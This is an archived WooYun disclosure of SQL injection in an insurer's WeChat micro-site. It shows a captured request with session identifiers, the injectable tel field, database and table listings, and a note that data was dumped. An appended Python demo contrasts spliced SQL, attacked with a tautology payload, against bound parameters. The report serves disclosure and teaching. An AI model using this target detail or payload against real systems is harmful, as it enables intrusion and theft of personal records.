WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
2015-10-09: Details sent to the vendor, awaiting vendor handling
2015-10-10: Vendor confirmed; details visible to the vendor only
2015-10-20: Details opened to core white hats and relevant domain experts
2015-10-30: Details opened to regular white hats
2015-11-09: Details opened to intern white hats
2015-11-24: Details opened to the public
A teammate who drags you down
WeChat side of China Life Property & Casualty Insurance, Tangshan central sub-branch (国寿财险唐山中支)
Tapping into the micro-site, I captured this request:
POST /weixin/index.php?g=Wap&m=Userinfo&a=index&token=huxrkk1428376877&wecha_id=oxT0iuGdNJkw4kNv-lefTbezX-JY HTTP/1.1
Host: www.winadd.cn
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://www.winadd.cn
Content-Length: 94
Connection: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13A342 MicroMessenger/6.3.1 NetType/WIFI Language/zh_CN
Referer: http://www.winadd.cn/weixin/index.php?g=Wap&m=Userinfo&a=index&token=huxrkk1428376877&wecha_id=oxT0iuGdNJkw4kNv-lefTbezX-JY
Cookie: PHPSESSID=90b06811abbe786a7065f3fe860f90c7

wechaname=&tel=13012345678&truename=%E7%8E%8B%E5%B8%85&qq=&sex=1&birthday=2002033&action=index
The injectable parameter is tel. The server hosts a large number of databases:
available databases [9]:
[*] boyacms
[*] byhh-weixin
[*] byhh-weixinnew
[*] byhh_weixin_demo
[*] information_schema
[*] iwebmall
[*] mysql
[*] weixin
[*] x25gbk
Let's look at the tables in the current database:
Database: byhh-weixin
[138 tables]
+--------------------------+
| wx_access                |
| wx_access_token          |
| wx_activity              |
| wx_address               |
| wx_address_danyuan       |
| wx_address_loupan        |
| wx_adma                  |
| wx_alipay_config         |
| wx_api                   |
| wx_areply                |
| wx_article               |
| wx_autumns_box           |
| wx_autumns_ip            |
| wx_autumns_open          |
| wx_canyin_yaoqing        |
| wx_canyin_yaoqing_cart   |
| wx_case                  |
| wx_catemenu              |
| wx_cehua                 |
| wx_classify              |
| wx_company               |
| wx_diymen_class          |
| wx_diymen_set            |
| wx_dream                 |
| wx_feyin                 |
| wx_feyin_record          |
| wx_flash                 |
| wx_function              |
| wx_games                 |
| wx_games_record          |
| wx_home                  |
| wx_hongbao               |
| wx_hongbao_exchange      |
| wx_hongbao_log           |
| wx_hongbao_prize         |
| wx_hongbao_reward        |
| wx_hongbao_zhuli_log     |
| wx_host                  |
| wx_host_list_add         |
| wx_host_order            |
| wx_hots                  |
| wx_hotspinglun           |
| wx_hotuser               |
| wx_img                   |
| wx_indent                |
| wx_jingpai               |
| wx_jingpai_record        |
| wx_jsapi_ticket          |
| wx_kaiyedl               |
| wx_keyword               |
| wx_leitai_expense        |
| wx_lightapp              |
| wx_lightapp_detail       |
| wx_links                 |
| wx_liuyan                |
| wx_lottery               |
| wx_lottery_bound         |
| wx_lottery_record        |
| wx_marrycard             |
| wx_marrycard_wish        |
| wx_member                |
| wx_member_card_contact   |
| wx_member_card_coupon    |
| wx_member_card_create    |
| wx_member_card_exchange  |
| wx_member_card_info      |
| wx_member_card_integral  |
| wx_member_card_set       |
| wx_member_card_sign      |
| wx_member_card_vip       |
| wx_membercard            |
| wx_membercard_duihuan    |
| wx_membercard_record     |
| wx_membercard_user       |
| wx_menuplus              |
| wx_nearby_user           |
| wx_node                  |
| wx_open_tab              |
| wx_order                 |
| wx_ordering_class        |
| wx_ordering_set          |
| wx_other                 |
| wx_panorama              |
| wx_photo                 |
| wx_photo_list            |
| wx_product               |
| wx_product_cart          |
| wx_product_cart_list     |
| wx_product_cat           |
| wx_product_diningtable   |
| wx_qixi_question         |
| wx_qixi_shop_question    |
| wx_qixi_userinfo         |
| wx_qixi_userinfo_lottery |
| wx_recognition           |
| wx_recognition_record    |
| wx_red_packet            |
| wx_red_packet_exchange   |
| wx_red_packet_log        |
| wx_red_packet_prize      |
| wx_red_packet_reward     |
| wx_rekeyword             |
| wx_reply_info            |
| wx_requestdata           |
| wx_role                  |
| wx_role_user             |
| wx_selfform              |
| wx_selfform_input        |
| wx_selfform_value        |
| wx_site                  |
| wx_site_plugmenu         |
| wx_snccode               |
| wx_system_info           |
| wx_table_record          |
| wx_taobao                |
| wx_team                  |
| wx_team_tags             |
| wx_text                  |
| wx_token_open            |
| wx_token_open_div        |
| wx_user                  |
| wx_user_group            |
| wx_user_request          |
| wx_userinfo              |
| wx_users                 |
| wx_voiceresponse         |
| wx_weather               |
| wx_wecha_user            |
| wx_wecha_userinfo        |
| wx_wechat_group          |
| wx_wechat_group_list     |
| wx_wifi_relation         |
| wx_wifi_token            |
| wx_world_cup_date        |
| wx_world_cup_lottery     |
| wx_world_cup_name        |
| wx_world_cup_record      |
| wx_wxuser                |
+--------------------------+
Information involved
Dumped a few of them to take a look.
Fix recommendation: filter the input, or find a different teammate.
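Added example, not code from the report or from the winadd.cn application (whose source is not shown): the query pattern that makes a field like tel injectable, beside the two remedies the recommendation above points at, a bound parameter and an allowlist filter on the field. It decodes the captured form body, then runs the legitimate tel value and a tautology payload through both query styles against a constructed in-memory SQLite table. The table name is taken from the table list; its columns, the second row, the payload and the "11-digit mainland mobile number" rule are assumptions made for the demonstration.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# The form body captured in the report (the bytes after the Cookie header).
CAPTURED_BODY = ("wechaname=&tel=13012345678&truename=%E7%8E%8B%E5%B8%85"
                 "&qq=&sex=1&birthday=2002033&action=index")

# Constructed rows for a wx_wecha_userinfo-style table. The column layout and
# the second record are assumptions: the report lists table names only.
SAMPLE_ROWS = [
    ("oxT0iuGdNJkw4kNv-lefTbezX-JY", "13012345678", "王帅"),
    ("oFAKEwechaid0000000000000002", "13900000000", "someone else"),
]


def form_fields(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def open_db() -> sqlite3.Connection:
    """In-memory stand-in for the byhh-weixin database, seeded with SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wx_wecha_userinfo ("
        "id INTEGER PRIMARY KEY, wecha_id TEXT, tel TEXT, truename TEXT)"
    )
    conn.executemany(
        "INSERT INTO wx_wecha_userinfo (wecha_id, tel, truename) VALUES (?, ?, ?)",
        SAMPLE_ROWS,
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, tel: str) -> list:
    """The defect class behind the report: `tel` is spliced into the SQL text,
    so a quote inside it closes the string literal and the rest is parsed as SQL."""
    sql = "SELECT wecha_id, truename FROM wx_wecha_userinfo WHERE tel = '%s'" % tel
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, tel: str) -> list:
    """Hardened form: the value travels as a bound parameter and is never parsed as SQL."""
    return conn.execute(
        "SELECT wecha_id, truename FROM wx_wecha_userinfo WHERE tel = ?", (tel,)
    ).fetchall()


def is_plausible_tel(tel: str) -> bool:
    """Allowlist check on what the field is supposed to hold (assumed here to be an
    11-digit mainland China mobile number); anything else is rejected before any query."""
    return re.fullmatch(r"1[3-9]\d{9}", tel) is not None


def demo() -> dict:
    """Run the captured tel value and a tautology payload through both query styles."""
    conn = open_db()
    legit = form_fields(CAPTURED_BODY)["tel"]
    payload = "' OR '1'='1"  # constructed payload, not one taken from the report
    return {
        "legit_vulnerable": len(lookup_vulnerable(conn, legit)),      # exact match: 1 row
        "payload_vulnerable": len(lookup_vulnerable(conn, payload)),  # WHERE becomes always-true: every row
        "payload_safe": len(lookup_safe(conn, payload)),              # compared as a literal: 0 rows
        "payload_passes_filter": is_plausible_tel(payload),           # rejected by the allowlist
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The allowlist is a second line of defence, not a substitute for the bound parameter: fields such as truename legitimately contain characters a naive filter would have to let through, and only parameterisation keeps them from reaching the SQL parser.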
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-10-10 08:39
Thank you.
None yet